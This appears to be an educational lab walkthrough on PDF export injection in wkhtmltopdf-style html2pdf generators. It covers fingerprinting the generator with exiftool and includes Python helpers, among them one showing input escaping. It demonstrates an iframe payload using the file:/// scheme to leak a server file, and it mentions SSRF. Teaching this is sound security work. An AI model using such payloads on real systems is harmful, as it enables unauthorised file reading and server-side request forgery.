What are html2pdf generators?
Most of us have used a web service that offers to print a page or some piece of information, after which the browser downloads a PDF file. That PDF file is usually built on the server with some tool or programming library.
Some tools and programming libraries enable the construction of a PDF file using HTML code. This type of PDF generator can be called an html2pdf generator, as it takes HTML code as input and generates a PDF file from it. One such tool is wkhtmltopdf.
The tool accepts HTML code, renders it with a browser engine (essentially opening the page invisibly in a browser; wkhtmltopdf uses the Qt WebKit engine) and then generates a PDF file from the rendered page. However, this poses a danger.
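To make the flow concrete, here is a minimal sketch of how a web application might hand HTML to wkhtmltopdf on the server. The function names and file names are hypothetical and not taken from any particular application; the only thing assumed about the tool is its basic command-line form, an input document followed by an output file.

```python
import subprocess
import tempfile
from pathlib import Path


def build_command(html_path: str, pdf_path: str) -> list[str]:
    """Return the basic wkhtmltopdf invocation: input document, then output file."""
    return ["wkhtmltopdf", html_path, pdf_path]


def export_pdf(html_code: str, pdf_path: str) -> None:
    """Write the HTML to a temporary file and let wkhtmltopdf render it to a PDF."""
    with tempfile.TemporaryDirectory() as workdir:
        html_path = Path(workdir) / "input.html"
        html_path.write_text(html_code, encoding="utf-8")
        # The page is loaded and rendered on the server, so every resource
        # the HTML references is fetched from the server's point of view.
        subprocess.run(build_command(str(html_path), pdf_path), check=True)
```

Calling `export_pdf("<h1>Receipt</h1>", "receipt.pdf")` would require wkhtmltopdf to be installed on the machine running the code.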
What are PDF export injections?
What happens if an attacker is able to manipulate or control the HTML code that is fed to the browser engine used by the PDF generator?
In the worst case, the attacker can read files from the server or perform Server-Side Request Forgery (SSRF) attacks. This is because the HTML is rendered on the server, so the code can reach resources that are only accessible from there, such as the server's local files.
We speak of a PDF export injection when an attacker is able to manipulate the HTML code used by the PDF generator and thus get their own HTML code executed in the browser engine used by the generator.
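One common way for attacker-controlled HTML to end up in the generator is a template that embeds user input without escaping it. The sketch below is a hypothetical illustration of that situation (the template, the `name` field and the function names are assumptions, not the exercise target's code) and shows how escaping the input turns the markup into harmless text.

```python
import html

# Hypothetical receipt template that is later passed to the PDF generator.
TEMPLATE = "<html><body><h1>Receipt</h1><p>Customer: {name}</p></body></html>"


def render_unsafe(name: str) -> str:
    """Embed user input as-is: any markup in it becomes part of the page."""
    return TEMPLATE.format(name=name)


def render_escaped(name: str) -> str:
    """Escape user input first, so the engine shows it as text instead of markup."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


payload = '<iframe src="file:///flag.txt"></iframe>'
unsafe_page = render_unsafe(payload)    # contains a live iframe element
escaped_page = render_escaped(payload)  # contains &lt;iframe ... as plain text
```

In the unsafe variant the browser engine would treat the injected iframe like any other element of the page, which is exactly the situation described above.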
Next, we exploit the vulnerability present in the exercise target. You can start the task below and repeat the steps at your own pace.
Investigation of the PDF generator
We start the vulnerability search by first determining how the target to be tested operates. We quickly notice that the system accepts HTML files and can then "export" PDF files from them.
When approaching a system with a "black-box" method, meaning that no source code of the system is available, it can be difficult to understand what a particular functionality actually does. When the system produces PDF files for us, however, it is sometimes possible to determine which tool was used to create the file, because PDF generators (and other tools) often leave a trace of themselves in the file's metadata.
Metadata can be read, for example, with a tool called exiftool.
When we pass a PDF file generated by the web application to exiftool, the Creator attribute shows the name and version of the PDF generator. Hint: in wkhtmltopdf versions after 0.12.5, local file reading is blocked by default, but SSRF is still possible.
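The same check can be scripted. The following is a minimal sketch that assumes exiftool is installed and uses its JSON output option (`-j`); the helper names are hypothetical, and the sample Creator value in the comments is only an illustration of what such metadata may look like, not output from the exercise target.

```python
import json
import re
import subprocess
from typing import Optional


def parse_exiftool_json(output: str) -> dict:
    """Pick the Creator and Producer tags out of exiftool's JSON output."""
    records = json.loads(output)
    record = records[0] if records else {}
    return {tag: record.get(tag) for tag in ("Creator", "Producer")}


def read_generator_info(pdf_path: str) -> dict:
    """Run exiftool on a PDF and return its Creator and Producer metadata."""
    result = subprocess.run(
        ["exiftool", "-j", "-Creator", "-Producer", pdf_path],
        capture_output=True, text=True, check=True,
    )
    return parse_exiftool_json(result.stdout)


def extract_version(creator: Optional[str]) -> Optional[tuple]:
    """Find the first x.y.z version number in a Creator string, if there is one."""
    # Illustrative input: "wkhtmltopdf 0.12.5" would yield (0, 12, 5).
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", creator or "")
    return tuple(int(part) for part in match.groups()) if match else None
```

Comparing the extracted version against `(0, 12, 5)` gives a quick indication of whether the file scheme is worth trying or whether to concentrate on SSRF instead.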
This way, it is often possible to examine the logic behind the creation of various system-generated files. Sometimes applications also use outdated components for file conversion or manipulation.
It is important to note that not all PDF generators build PDF files from HTML code, and that generators differ greatly in how they work. For this reason, it is important to try to identify the component in use, after which its documentation can tell you how it works.
File leaking with file scheme and iframe element
Next, we will use the iframe element in the HTML file to check whether the website allows it in PDF generation.
<iframe width=400 height=400 src="https://www.example.com/"></iframe>
We generate a PDF file and look inside it. If the content of the framed page appears in the PDF, the generator renders iframe elements.
Next, we will use the file:/// scheme. Unlike http and https, the file scheme refers to the computer's own file system, instead of a separate service. This is done in the following way.
<iframe width=400 height=400 src="file:///flag.txt"></iframe>
When we generate a PDF file from this HTML file, we see the content of the file in it. We have successfully leaked one of the server's own files through a vulnerable PDF generator.
Great! You have completed the first PDF export injection lab. Try using other HTML elements in the generation. Can you come up with other attack methods?
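When repeating the steps, it can be handy to generate the two test files with a small script. This is only a convenience sketch: the helper names and output file names are hypothetical, while the iframe markup and the two sources are the ones used above.

```python
import html
from pathlib import Path


def iframe_probe(src: str, width: int = 400, height: int = 400) -> str:
    """Build an iframe element that asks the PDF generator to load `src`."""
    safe_src = html.escape(src, quote=True)  # keep the attribute value well-formed
    return f'<iframe width={width} height={height} src="{safe_src}"></iframe>'


def write_probes(directory: str) -> list[Path]:
    """Write one HTML file per probe: an external page and a local file."""
    probes = {
        "probe_http.html": "https://www.example.com/",
        "probe_file.html": "file:///flag.txt",
    }
    out_dir = Path(directory)
    out_dir.mkdir(parents=True, exist_ok=True)
    written = []
    for filename, src in probes.items():
        path = out_dir / filename
        path.write_text(iframe_probe(src) + "\n", encoding="utf-8")
        written.append(path)
    return written
```

Each generated file can then be uploaded to the exercise target in the same way as the hand-written ones.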